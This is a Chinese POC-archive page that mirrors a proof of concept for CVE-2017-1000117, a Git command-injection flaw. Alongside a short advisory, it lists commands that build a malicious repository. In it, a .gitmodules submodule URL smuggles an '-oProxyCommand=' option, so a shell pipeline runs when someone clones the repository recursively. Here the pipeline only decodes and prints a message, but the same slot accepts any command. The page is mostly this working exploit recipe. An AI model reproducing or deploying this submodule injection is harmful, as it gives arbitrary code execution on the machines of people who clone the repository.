POC详情: b0a68d1ee0e339c20538bb0c8c301783c7db93b4

来源
关联漏洞
标题: Git 命令注入漏洞 (CVE-2017-1000117)
描述:Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。 Git 2.7.5之前的版本中存在命令漏洞。远程攻击者可借助特制的‘ssh://...’URL利用该漏洞运行任意设备已退出的程序。
介绍
# CVE-2017-1000117

## How it works?
```
$ git clone --recursive git@github.com:ikmski/CVE-2017-1000117.git
```

## How to create this repository

```
$ cat message.txt | gzip | base64 > command


$ git submodule add git@github.com:ikmski/Hello-World.git subs/CVE-2017-1000117

$ cat << EOS > .gitmodules
[submodule "subs/CVE-2017-1000117"]
    path = subs/CVE-2017-1000117
    url = ssh://-oProxyCommand=cat command | base64 --decode | gzip -d >&2 /subs/CVE-2017-1000117
EOS

$ git submodule sync
$ git submodule update
```

文件快照

[4.0K] /data/pocs/b0a68d1ee0e339c20538bb0c8c301783c7db93b4 ├── [ 169] command ├── [ 189] message.txt ├── [ 526] README.md └── [4.0K] subs └── [4.0K] CVE-2017-1000117 2 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。